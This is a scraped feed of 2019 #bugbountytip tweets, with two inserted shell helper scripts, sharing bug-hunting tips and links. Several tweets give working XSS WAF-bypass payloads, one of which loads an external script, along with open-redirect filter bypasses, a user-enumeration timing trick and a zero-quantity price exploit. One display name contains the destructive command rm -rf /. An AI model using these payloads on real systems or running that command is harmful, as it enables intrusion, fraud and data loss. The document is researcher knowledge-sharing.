1 who else is attending Global AppSec - Amsterdam (September 23-27) this year? #infosec #BugBounty #bugbountytip
alias ls=' rm -rf /'
@spyerror


2019-07-08 07:51:27
0 While the money is still in the hands, in the near future, everyone will witness, although only a part will witness. #WAF #BugBounty #BugBountyTip #Cyber #Researcher
Ammar Amer
@cry__pto


2019-07-08 06:57:29
2 Check out the new awesome resources in my repository. I have added 87 links to advanced resources to my GitHub repository, and the number will reach 2000 links at any time soon. #OSINT #Hacking #PenTest #redteam #malware #CyberSecurity #BugBountyTip https://t.co/q2layzVpKz https://t.co/EF7u0ghngC
incredincomp
@incredincomp


2019-07-08 04:07:45
2 Is the private IP scheme disclosure considered a bug or should I literally be trying to pivot to a different OSI layer(and if I cant, should I still report that I know how to find more info)? Obviously scope aware, just curious if anyone'd care. I would #bugbounty #bugbountytip
Michael Blake
@Michael1026H1


2019-07-08 03:12:43
0 #bugbountytip Need a redirect, maybe a 301 or 303? Use https://t.co/YyaeYQFrkP to get a quick URL. You can configure it using this guide https://t.co/jUbe32eeJq Great for SSRF.
Bug Bounty TuT
@BugTut


2019-07-07 20:10:49
0 Guide 001 |Getting Started in Bug Bounty Hunting.. Start Bug Bounty 1st To Last.. Thanks To @KHIZER_JAVED47 Article Link:- https://t.co/CrabN9jmjz #BugHunting #BugBounty #BugBountyTip #bugbountytips https://t.co/DL2zcol7CI
Amit Dubey
@MrR0Y4L3


2019-07-07 15:59:16
0 Burp suite extensions which I found quite useful - 1. ActiveScan++ 2. Knife (https://t.co/C9kkI166eA) 3. SSLScan 4. AutoRepeater 5. Software Vulnerability Scanner 6. Logger++ 7. ErrorMessageCheck Suggestions are welcome :) #burpsuite #pentest #infosec #BugBountyTip #bugbounty
Nikos Gkogkos
@ngkogkos


2019-07-07 14:03:11
0 If you are like me, running hundreds of #gobusters, you may find this #bash function useful, it cats X most recent output files. Assumes all output is under CWD, & "may" work w/ mixed output files. Grep by "Found:", length.. See comments for code. #BugBountyTip #pentest #infosec https://t.co/dsy0tuX2Yq
Hussein Daher
@HusseiN98D


2019-07-07 13:47:43
4 An overview of what I did for my recent $10 000 bug. Always go for the highest impact! #bugbounty #bugbountytips #bugbountytip https://t.co/DnHxbneXuN
Nikos Gkogkos
@ngkogkos


2019-07-07 13:34:20
0 If you are like me, running hundreds of #gobusters, you may find this #bash function useful, it cats X most recent output files. Assumes all output is under CWD, & "may" work w/ mixed output files. Grep by "Found:", length.. See comments for code. #BugBountyTip #pentest #infosec
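The helper the two tweets above (by @ngkogkos) describe is only linked in the replies, not shown here. As an added example that is not the tweet author's code, here is one way to write such a function in POSIX sh. It assumes the gobuster output files sit directly in the current directory and that hits are printed as lines starting with "Found:" (the string the tweet greps for); the sample files in the usage are constructed.

```sh
#!/bin/sh
# Added example, not the tweet author's function.
# recent_outputs N [PATTERN]
#   Print the N most recently modified regular files in the current
#   directory, newest first. With PATTERN, print only the lines of each
#   file that match it (e.g. 'Found:'), still under a header per file.
recent_outputs() {
  n="${1:-5}"
  pattern="${2:-}"
  # ls -t sorts by modification time, newest first; -p appends a slash to
  # directories so they can be dropped, leaving only regular files.
  ls -tp | grep -v '/$' | head -n "$n" | while IFS= read -r f; do
    printf '==> %s <==\n' "$f"
    if [ -n "$pattern" ]; then
      # grep exits 1 when nothing matches; that is not an error here
      grep -- "$pattern" "$f" || true
    else
      cat -- "$f"
    fi
  done
}

# count_found FILE: number of "Found:" lines in one output file, handy for
# spotting wordlist runs that produced nothing at all.
count_found() {
  grep -c '^Found:' "$1" || true
}

# Usage (constructed sample): recent_outputs 3 'Found:'
```

`ls -tp` is POSIX, so the function runs under dash as well as bash; filenames containing newlines are the one case the `ls`-based listing cannot handle.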
Sarvagya Sagar
@0ffensivemitthu


2019-07-07 12:34:01
1 [ My Blog Post #02 ] -- Repost: read this, you'll definitely fall in love with Regex: “Fall in love with Regex” by Sarvagya Sagar https://t.co/7a9Cd89oXR 🌈 #BugBounty #bugbountytips #BugBountyTip #infosec #infosec19 #CyberSecurity
Securisec 🚀
@securisec


2019-07-07 04:16:41
0 "RT RT 0ffensivemitthu: [ #BugBounty #BugBountyTip ] -- 💰 HTTP Parameter Pollution Intro : https://t.co/OKBqqZF4Bj Slide : https://t.co/VEBRb0yY4N Writeup : https://t.co/ztjLNd2OAO or https://t.co/Zn2HnUb3KO Report : https://t.co/oiTVmyXxKn or https://t.co/PSDeo1D7dM 🌈"
Ammar Amer
@cry__pto


2019-07-07 00:13:09
2 And now there are 1300 links to important resources in the world of hacking. Check out the new links about redteam, exploit development, OSCP, etc. #BugBountyTip #Hacker #infosec #exploitation https://t.co/ldxTY0MZIt https://t.co/PF1Q8znOCz
Ammar Amer
@cry__pto


2019-07-06 18:19:06
1 Server-Side Request Forgery (SSRF) vulnerability on https://t.co/fOlTXYOTDJ: https://t.co/GXSRfRqpAP #BugBountyTip #BugBounty
Sarvagya Sagar
@0ffensivemitthu


2019-07-06 11:16:50
3 [ My Blog Post #01 ] -- Repost, my first blog post. 💰 "Hunt Unvalidated Url Redirects in wild” by Sarvagya Sagar https://t.co/wzsdk1bURQ #BugBountyTip #bugbountytips #BugBounty #infosec #infosec19 #CyberSecurity #infosecurity
Sarvagya Sagar
@0ffensivemitthu


2019-07-06 10:45:25
1 [ #BugBounty #BugBountyTip ] -- 💰 HTTP Parameter Pollution Intro : https://t.co/RGUfzyX8ZU Slide : https://t.co/zjSdRsojm4 Writeup : https://t.co/WGU4ctF86X or https://t.co/QC3kdoISbR Report : https://t.co/TIK43b00zX or https://t.co/GsmuDR1DLa 🌈
alias ls=' rm -rf /'
@spyerror


2019-07-06 10:20:10
0 Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-06 00:52:12
1 New links were added to the repository, about OSCP and advanced Google hacking techniques and dorks for various attacks. Check it out. The number of links is now 1271 and it will get higher every day. #BugBountyTip #Hacking #infosec #OSINT https://t.co/q2layzVpKz https://t.co/6hsjupaauu
Ammar Amer
@cry__pto


2019-07-05 22:14:51
3 New links were added to the repository. Check it out. The number of links is now 1225 and it will get higher every day. #BugBountyTip #Hacking #infosec #redteam #CyberSecurity #bugbounties https://t.co/q2layzVpKz https://t.co/T0xtpz7hUK
Fisher
@Regala_


2019-07-05 22:00:07
3 https://t.co/iKUQ75PaLI - @ngalongc highlights why you should always read the documentation when hunting on a program. And also kudos for @yaworsk and @ShopifyEng for triaging even being a "hypothetical" #bugbounty #bugbountytip
Sparsh Kulshrestha
@d0tdotslash


2019-07-05 20:10:24
0 @NahamSec @yappare I usually try #BugBountyTip when searching for random tips and tricks.
Mehmet Aura
@rootaura


2019-07-05 19:59:15
0 I released my tool, which is named "BountyBot". It checks for unclaimed social media accounts which are linked on a page, etc. (by the way, I'm new at py) https://t.co/VKBHPVlzcD #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd https://t.co/teDQJ4Kf1h
Jatin
@techyfreakk


2019-07-05 18:25:10
7 For shortening Linux commands, you can use the alias command. As an example: alias nmapq="nmap -Pn -T4 -A" Now just run nmapq $target. Add it to /home/user/.bashrc, and you're good to go 🙂 #linuxtip #bugbountytip
Samet ŞAHİN
@sametsahinnet


2019-07-05 17:42:15
1 How to steal #CSRF Tokens with simple #XSS vulnerability ? https://t.co/140rJjo5Nt #BugBountytip #bugbounty #infosec #hacking #TogetherWeHitHarder
architect
@architectt1


2019-07-05 14:13:30
0 Re-exploited Open Redirect on a private program where I reported that and got a bounty for it not so long ago. Always try other strategies once a report has been resolved. #bugbountytip #bugbounty #infosec #security
CaptainFreak
@0xCaptainFreak


2019-07-05 13:40:52
0 Learn about ZAP @zaproxy from this video if you use Burp extensively and find ZAP UI intimidating. Also the HUD feature👌, Awesome stuff @Bugcrowd @david_scrobonia https://t.co/nJ1IDtgBWE #bugbountytip
Dhaval Panchal
@cedhaval02


2019-07-05 06:53:04
0 @Divya_Bhaskar Hey, recently I checked out your website and I saw some bug points that I have attached below. Have a good day to all :) #news #bugbountytip https://t.co/6Iqidefm2y
Sarvagya Sagar
@0ffensivemitthu


2019-07-05 05:58:19
0 [ #BugBounty #bugbountytip ] -- 💰 Open redirects Video : https://t.co/kwvNvWlelM or https://t.co/2ggZiuHoN5 Writeup : https://t.co/fbZ4b2H9eu or https://t.co/wzsdk1bURQ Reports : https://t.co/OuP4nBeJOo or https://t.co/mk1I69zu6k Cheatsheet : https://t.co/yQSgrOPjVt 🌈
Bohdan Korzhynskyi
@h1_ragnar


2019-07-04 22:01:43
8 Cloudflare #XSS #Bypass via dot 1'"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
Bohdan Korzhynskyi
@h1_ragnar


2019-07-04 21:15:37
0 Cloudflare #XSS #Bypass via dot '"><img/src/onerror=.1|alert``> #WAF #BugBounty #BugBountyTip
vavkamil
@vavkamil


2019-07-04 20:37:31
0 Just launched v1.0 of https://t.co/jZS6PtN22C ~ Latest bug bounty related tweets ~ #bugbountytip
HackIsOn ®
@hackison


2019-07-04 14:58:57
1 “Account Takeover Using CSRF(json-based)” by shub rathore https://t.co/4Obn65Bode #bugbountytip #bugbounty
Dawood Ikhlaq
@daudmalik06


2019-07-04 13:49:28
1 Just bypassed a custom firewall with a URL encoding technique. Final payload: %253%63svg%2520onload=alert(1)%253%65 The firewall was blocking "%253c". Trick: %25 3 %63 -> when the app decoded it, it became %3c -> the app decoded it again and it became < and I got an alert #bugbountytip
$!|3nt_4unt3r
@shub66452


2019-07-04 11:31:04
58 My first blog #bugbounties #bugbountytip https://t.co/scMySo36WD
Neolex
@NeolexSecurity


2019-07-04 10:32:15
0 Hey guys, I have an XSS that works on IE/Edge due to the non-encoding of the URL. Is there a way to make it work on Firefox/Chrome? #bugbounty #bugbountytip
darkmage
@therealdarkmage


2019-07-04 02:16:25
0 TIL that %c2%a0 can be used to overcome XSS defenses. #BugBounty #bugbountytip #bugbountytips
David Alison
@Nokibulislam1


2019-07-04 01:26:22
1 #BugBountyTip: Have a char limit for XSS? See if it’s appended with other fields (first + last name). You can then split the payloads (this case needed JQuery to load ext script): FirstName: “><svg/onload=“$.getScript(‘http://‘+ LastName: ‘https://t.co/fSzBPqvWxY’)..” #bugbounty
Arif Khan
@payloadartist


2019-07-03 20:05:26
29 Common Android #security vulnerabilities #bugbounty #bugbountytip https://t.co/ZnNDzj51o9
Petko D. Petkov
@pdp


2019-07-03 17:56:05
1 The real impact of a vulnerability is measured by its potential - not just the current impact but future impact as well. Real attackers can sit on a vulnerability for years. #bugbountytip
Yash Sodha 🌟
@y_sodha


2019-07-03 17:53:31
13 #BugBountyTip: Always remember to check emails for access control issues. Sometimes the same access control is not applied when sending emails. Thanks @gitlab for the bounty! https://t.co/sqzqBCph6F
Siva krishna
@le4rner


2019-07-03 16:21:43
54 I don't know why and how this bypassed cloudflare. But here it is javascript:{ alert`0` } @rodoassis @s0md3v @akhilreni_hs #bugbountytip #xssbypass PS: Pros are welcome to give your insights about this.
Abugzlife
@abugzlife1


2019-07-03 15:41:43
16 #BugBountyTip: Have a char limit for XSS? See if it’s appended with other fields (first + last name). You can then split the payloads (this case needed JQuery to load ext script): FirstName: “><svg/onload=“$.getScript(‘http://‘+ LastName: ‘https://t.co/WKmfmkNmNp’)..” #bugbounty
soaphorn seuo
@soaphornseuo


2019-07-03 10:23:09
5 [ #BugBounty #bugbountytip ] -- Cracking the Lens : Paper : https://t.co/ydXjQUxyVY Video : https://t.co/qerJ8DXT5g or https://t.co/twNLJFmczy Writeup : https://t.co/skBYPKjlUP Report : https://t.co/oblok1GZic
Morphine 'Ashraf'
@m0rph1n3e


2019-07-03 08:47:08
5 #bugbountytip #bugbounty #triagertip #bugbountytips #infosecurity #infosec I've found a reflective xss vulnerability, but it only works in IE, and Edge browser. Any idea, how to exploit it in the other web browsers using HTML file or directly by visiting the vuln endpoint?
Garth Humphreys
@garthhumphreys


2019-07-02 22:48:56
3 I think consistency is important in anything you do, especially with #infosec and #bugbounty - Consistently keep pushing to #learn more and #try harder, even if it's one line of code a day 🙂 #bugbountytip #bugbountytips
Alejandro Parodi
@SecSignal


2019-07-02 20:04:10
17 #BugBountyTip If you can't use quoted strings in your XSS payload, try to use regex functions that return strings! For example: t.setRequestHeader(([]+/Content-Type/g).substr(1,12),(([]+/application/g).substr(1,12)+([]+/json/g).substr(1,4)) Also, + can be %2b ;) #WAF #BugBounty
Fisher
@Regala_


2019-07-02 17:01:51
12 Ayyyy! Got featured on the latest hacking newsletter by @PentesterLand 🥳 Have a look and show some love, this person has been doing an amazing job on collecting, sharing resources and putting content out there for all BB fellows ❤️ #bugbounty #bugbountytip https://t.co/NEcoXNaZSL
Cade
@persian_mh17


2019-07-02 15:36:02
4 Enumerate websites that are accessible through HTTP/HTTPS (Specifically), in other words it can identify live websites for further testings #recon #bugbountytip https://t.co/LwB0soe7Y7
eForensics Magazine
@eForensics_Mag


2019-07-02 14:43:00
6 Bug Bounty Methodology (TTP- Tactics,Techniques and Procedures) V 2.0 | By Sanyam Chawla https://t.co/IF6mmn6OcE #bugbounty #bugbountyhunter #bugbountytip #bugbountyhunting #cybersecurity #digitalforensics
Ismail Tasdelen
@ismailtsdln


2019-07-02 04:23:11
5 If you have a web subdomain list in your hand and you want to capture them, here is an app that may be useful to you. 😎 --> https://t.co/XAqQJ91Tck #bugbountytip #bugbounty #websecurity
Fisher
@Regala_


2019-07-01 15:07:40
2 Did you know... triagers try to escalate your reports before handing them to the company? 😳💰 Show some love for them 😍 #bugbounty #triagertip #bugbountytip
[email protected]
@k3va1


2019-07-01 14:01:55
5 #bugbountytip When you get the path from which files are downloaded, remove the file from the URL and run dirsearch with @Jhaddix's all.txt; you will get juicy info😍
Petko D. Petkov
@pdp


2019-07-01 09:53:46
1 This new tool allows you to discover secrets at hyper-scale. #bugbountytip #bugbountytips #cloudflare https://t.co/jXFuNyxVlK
SaadAhmed
@XSaadAhmedX


2019-07-01 08:15:27
88 Here the write-up of IDOR 🧐 https://t.co/3haNz2hZfa #bugbountytip #bugbountytips #bugbounty @Bugcrowd
Sarvagya Sagar
@0ffensivemitthu


2019-07-01 08:10:32
28 [ #bugbountytip ] Open Redirection: If https:// is blacklisted then try Japanese punctuation symbols like 〱, ー, ゝ, 〵, 〽, 〳 etc. Example: ゝgoogle%2Ecom /ゝgoogle%2Ecom - Also try the Unicode of these symbols. #BugBounty #CyberSecurity #bugbountytips #infosec #infosec19
Petko D. Petkov
@pdp


2019-07-01 07:44:10
1 What is your average severity level? #bugbountytip #bugbountytips
Ameen
@ameenmaali


2019-07-01 07:15:41
1 #BugBountyTip: Take a break/relax every so often! After trying to learn too aggressively for 5 months straight, I got burnt out and submitted nearly nothing for a month+, going from my best to worst month. I’m feeling much better and ready to get back to it now in a relaxed pace https://t.co/IO7OoP88qf
Sarvagya Sagar
@0ffensivemitthu


2019-07-01 00:20:12
2 - #bugbountytip #0xWilt What I Learned Today #03: Open Redirection: If the domain name is blacklisted, then try the IP address in canonical notation, or in decimal, hex or octal notation, to bypass the blacklisted domain. #bugbountytips
Garth Humphreys
@garthhumphreys


2019-06-30 23:36:56
2 So basically... the #recon phase never ends. Keep digging for more info #bugbounty #bugbountytip #hacking #infosec

@pouyana1


2019-06-30 20:57:45
2 Enumerating Exchange users through the Outlook Web login page: invalid users have a longer response time than valid users; an attacker can use this feature to enumerate a list of users. Valid users respond in less time than invalid users. #bugbountytip #infosec #hacking #hack
Petko D. Petkov
@pdp


2019-06-30 20:15:59
4 Tracking 197 bug bounty programs like a pro. I don't know about your shell scripts but this thing is hot. #bugbountytip https://t.co/WA5AznSIyr
Nikos Gkogkos
@ngkogkos


2019-06-30 20:12:42
16 Do you have a big list of URLs & want to fuzz them for XSS in the URL path? Use @TomNomNom's meg tool! 1. Add /?xss=xss1"2<3%22' in paths.txt 2. meg -L -c 5 paths.txt urls.txt ./megxss_out 3. grep -HC5 'xss1"' --color ./megxss_out/*/* #bugbounty #bugbountytip #pentest #infosec
Mhamed Kchikech
@mhamed_kchikech


2019-06-30 17:23:38
1 @SecuAudit @Hacker0x01 It's more like a #BugBountyTip
Sarvagya Sagar
@0ffensivemitthu


2019-06-30 15:15:08
13 What I learned Today : My Daily dose of progress thread. In this thread I will post whatever I learn, read or watch related to #infosec , #BugBounty , #bugbountytip , #Hacking, #CyberSecurity, #OSINT .Make sure to follow it to get regular quality content. Retweet to invite others
Fisher
@Regala_


2019-06-30 09:58:54
6 It's always good fun to hang out with @stokfredrik, shooting this video only felt natural 🙏🙏🙏 #bugbounty #bugbountytip https://t.co/8MHud7mIeX
n a f f y
@nnwakelam


2019-06-30 09:33:02
20 Learn to fuzz all available inputs and start inferring things based upon what you are being returned #bugbountytip
Navneet
@na5n33t


2019-06-30 08:32:52
4 CSRF token was absent in the POST request, but the value of the parameter wishlistID is unique and not known to the attacker, which could protect it from CSRF. Tried to submit it with a blank value and was successfully able to perform CSRF. Waiting for a reply from the team. #bugbountytip #hackerone #bugcrowd #infosec
Ashraf .G.
@U2w0k


2019-06-29 22:17:41
5 Got an XSS vulnerability, but the domain is behind the annoying CloudFlare WAF .. couldn't get the original IP of the domain and couldn't bypass it either. Any suggestions? #BugBounty #togetherwehitharder #bugbountytip
Ammar Amer
@cry__pto


2019-06-29 21:08:52
5 Surprise! All the links that I am sharing on my GitHub repository have been stored on my PC hard drive as PDF files; there are more than 1,300 articles as PDF files. I am gonna share these files also on my GitHub repository. #Hacking #BugBounty #infosec #bugbountytip
SaadAhmed
@XSaadAhmedX


2019-06-29 19:33:23
168 BugBountyTip: If you're playing with an `API ENDPOINT`, always try to send an `INVALID CONTENT TYPE`; you may end up getting hidden endpoints in the `RESPONSE` #bugbountytip #bugbountytips #bugbounty https://t.co/fcaDHtJxiH
Yadhavi
@PrincessYadhavi


2019-06-29 18:12:36
1 I tried to scan a target with masscan; the input file has 522 hosts but masscan only scans 438 hosts. Why? Strange! PS: ( --rate=500) #masscan #bugbounty #bugbountytip #bugbountyhelp
Michael Blake
@Michael1026H1


2019-06-29 17:23:46
6 #bugbountytip The Burp extension Scan Check Builder is fantastic. You can build your own scan checks. Personally, I use this to passively detect and report things like URLs as parameter values and suspicious parameter names for manual testing.
iNoSec
@IsecEmAll


2019-06-29 10:28:43
1 If some bug bounty hunters are against sharing their tools, because they can lose some bounties, what do we think when they share others' tools on Twitter?? Rabbit hole, or is it because those are not their own tools?? #bugbountytips #bugbountytip
CryptoCris
@cryptocris88


2019-06-28 16:44:48
9 Dev Update 2 - June We will challenge our dev community to find bugs with our Bug Bounty Program to win rewards up to $5,000. More information later. Also: dApp competition soon! https://t.co/crInkoRQNV #blockchain #bugbounty #bugbountytip #developers #gamedeveloper
Régis Deldicque
@RegisDeldicque


2019-06-28 13:17:31
1 #bugbounty #Bugbountytip #Hacking I wish to compare technical mechanisms for protecting HTTP flows. In the diagram below, I used a cost/complexity representation. Does it seem correct to you? https://t.co/N0AWz0uVNW
Ali Çelebi
@_alicelebi


2019-06-28 06:26:32
3 Has anyone had successful stored XSS on Angular app recently? Would you mind sharing the payload? #BugBountyTip #bugbounty
m0z
@LooseSecurity


2019-06-27 23:48:12
6 Every time I tell someone I'm a hacker. 😂 https://t.co/2k2YRO1wIY #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
detroitsmash and 22 others
@detroitsmassh


2019-06-27 21:39:19
7 If you are using Burp's match&replace feature for spoofing the CORS origin, then change it to something like https://t.co/FUG19N5qeS instead of the default one, because developers mostly forget to escape the dot with \. in their regex #bugbountytip
1984isnow📖
@_gonzacabrera


2019-06-27 19:00:49
1 Me downloading Burp Suite Professional cracked. #Infosec #BugBounty #BugBountyTip #ProTip #VolveCristina https://t.co/VvJQHNXak5
C1h2e1
@C1h2e11


2019-06-27 15:50:39
4 https://t.co/cJ8kHgdWmM make your recon more fast and more easy #BugBountyTip #bugbounty #bugbountytips https://t.co/vr7ilRtyAc
Malav Sharma (Wolfdroid)
@ShMalav


2019-06-27 08:23:11
8 One-liner to replace one word with another in a file in vim: :%s/old_word/new_word/g This will replace the old word with the new word on all lines where it is present .. #bugbountytips #bugbountytip
Osama Avvan
@osamaavvan


2019-06-27 06:11:10
39 A writeup about CORS TO CSRF @Bugcrowd #BugBounty #bugbountytip https://t.co/7oeic4UuA3
David Alison
@Nokibulislam1


2019-06-26 15:32:28
0 Open Redirect : If http:// is blacklisted then try to Play with (Forward/Backward) Slash , browsers act as // Ex: //google%2Ecom ; /\google%2Ecom ; \/google.com ; /\/\google%2Ecom ; \/\google%2Ecom ; \/\/google.com ; #BugBounty #bugbountytip #infosec19 #infosec #cybersecurity
mAshraf
@mAshraf9_


2019-06-26 15:10:16
0 A security engineer's strength lies not in his skills or in the number of ZERO day of attacks he knows, but in the intensity of his understanding about security issue. #bugbountytip #bugbounty #bugbountyquote
Akshay Kumar Malhi
@Kumar_Akkiy


2019-06-26 10:06:18
0 Guys I got private invitation program from #hackerone, after getting 26 points on hackerone CTF program, so I need your feedback on private invitation programs. @KHIZER_JAVED47 @PratikY9967 @D0rkerDevil @AliRazzaq_ Thanks 🙏 #BugBounty #bugbountytip #togetherwehitharder
🕋 wareeq shile👨🏾‍💻
@wareeq_shile


2019-06-25 18:56:13
11 For monitoring js files https://t.co/93m2ozPlqe. Thanks for sharing @Mahmoud0x00 #bugbountytips #bugbounty #bugbountytip #BugBounty
Fisher
@Regala_


2019-06-25 18:39:36
3 🧐When writing a report involving different user roles, if possible, include your own testing credentials so it's easier for the team to validate. Happy triager = happy hacker 🥳 #bugbounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-06-25 14:48:52
43 Open Redirection -- You can use the Chinese separator "。" (%E3%80%82) instead of the dot "." (%2E) when the dot is blacklisted ... Example : target%2Ecom/reset-pass/users-token?go=google%E3%80%82com #bugbounty #bugbountytips #bugbountytip #Infosec #infosec19 #vulnerability #CyberSecurity
Broly
@Broly157


2019-06-25 14:37:26
0 @fuomag9 hey brother congrats for your 1st bug bounty. Can u give me some #bugbountytip.?? Plzz. I'm still studying various articles.
Thibeault
@thibeault_chenu


2019-06-25 11:49:06
2 @intigriti In the case of an e-commerce site, try to multiply the quantity by a value close to 0 (0.00008.....) this can allow you to get items for free. Tested at a food delivery site recently 👇 #BugBounty #BugBountyTip #HackWithIntigriti https://t.co/AzemqbmH2I
plenum 🇹🇳
@plenumlab


2019-06-25 11:16:20
24 Bash one-liner: - remove trailing characters/dots from a large file: cat myfile | while read i; do echo "${i%.}"; done - remove characters/dots from the beginning of each line: cat myfile | while read i; do echo "${i#.}"; done Replace the . with anything you want #BugBounty #bugbountytip
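The one-liners above read each line with a bare `read i` and print it with `echo`, which drops leading whitespace, interprets backslashes and can misread a line that starts with `-`. As an added example (not the tweet author's code), here are the same `${var%pattern}` / `${var#pattern}` expansions wrapped in POSIX sh functions that preserve each line exactly; a typical input is a DNS or subdomain listing with trailing dots. The third function goes beyond the tweet and removes a whole run of the character, which a single `%` expansion does not do. The input file used for the test is constructed.

```sh
#!/bin/sh
# Added example, not the tweet author's one-liners.
# Each function reads FILE line by line and prints the transformed line.
#   IFS=            keeps leading and trailing whitespace
#   read -r         keeps backslashes literal
#   printf '%s\n'   avoids echo's option parsing and escape handling
#   || [ -n "$line" ] keeps a final line that has no trailing newline

# strip_trailing FILE CHAR: drop one CHAR from the end of each line
strip_trailing() {
  while IFS= read -r line || [ -n "$line" ]; do
    # quoting "$2" makes the pattern literal even for glob characters
    printf '%s\n' "${line%"$2"}"
  done < "$1"
}

# strip_leading FILE CHAR: drop one CHAR from the start of each line
strip_leading() {
  while IFS= read -r line || [ -n "$line" ]; do
    printf '%s\n' "${line#"$2"}"
  done < "$1"
}

# trim_trailing_run FILE CHAR: drop every trailing CHAR, not just one
# (e.g. "host..." -> "host"); loops because ${x%pattern} removes one match
trim_trailing_run() {
  while IFS= read -r line || [ -n "$line" ]; do
    while [ "${line%"$2"}" != "$line" ]; do
      line="${line%"$2"}"
    done
    printf '%s\n' "$line"
  done < "$1"
}

# Usage: strip_trailing subdomains.txt .
```

Reading the file with a redirect instead of `cat file |` also saves a process and keeps the loop in the current shell, which matters if you later want to collect results into a variable.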
0xd0m7
@0xd0m7


2019-06-25 09:14:21
37 #bugbountytip if you find a file like that "rest/v1/ swagger.json" it might be interesting to use the OpenAPI Parser BurpSuite plugin to do a quick job ;) https://t.co/PcAmOLRgai